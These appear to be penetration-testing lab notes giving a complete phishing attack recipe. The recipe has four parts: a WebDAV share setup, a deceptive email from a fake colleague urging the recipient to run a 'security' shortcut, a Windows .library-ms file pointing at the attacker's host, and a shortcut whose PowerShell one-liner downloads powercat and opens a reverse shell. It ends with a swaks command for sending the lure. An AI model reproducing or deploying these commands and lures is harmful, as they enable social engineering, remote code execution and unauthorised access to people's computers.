Phishing for Access (Requires MailSVR)
Preparation
On Kali Machine:
Create a webshare for target machines to send files to
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
OR
wsgidav -H 0.0.0.0 -p 80 --auth anonymous -r /home/kali/beyond/webdav/
Create a text file named body.txt
Input the following email template into the text file
On Windows Machine:
Create a text file named: config.Library-ms
Input the following xml snippet below into the text file
Create a shortcut that runs the following powershell command that initiates a reverse shell
Transfer both files onto the Kali Machine for hosting
body.txt
Hey!
I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.
On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!
John
config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<Kali IP></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
automatic_configuration.lnk
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1'); powercat -c <Kali IP> -p <Kali port> -e powershell"
Exploit
On Kali Machine:
Have a netcat listener set up to catch the reverse shell
Have a python simple server set up to host the exploit
Send the email to target mail server and a destination email address
sudo swaks -t <Target EMAIL> -t <Target EMAIL> --from <Source EMAIL> --attach @config.Library-ms --server <MAILSVR IP> --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Goal: Target user receive the email, and and executes the .library-ms file. Upon execution, the target machine will fetch the Powercat binary from our Kali machine, and initiate a reverse shell with us. Giving us initial foothold onto the target machine
Last updated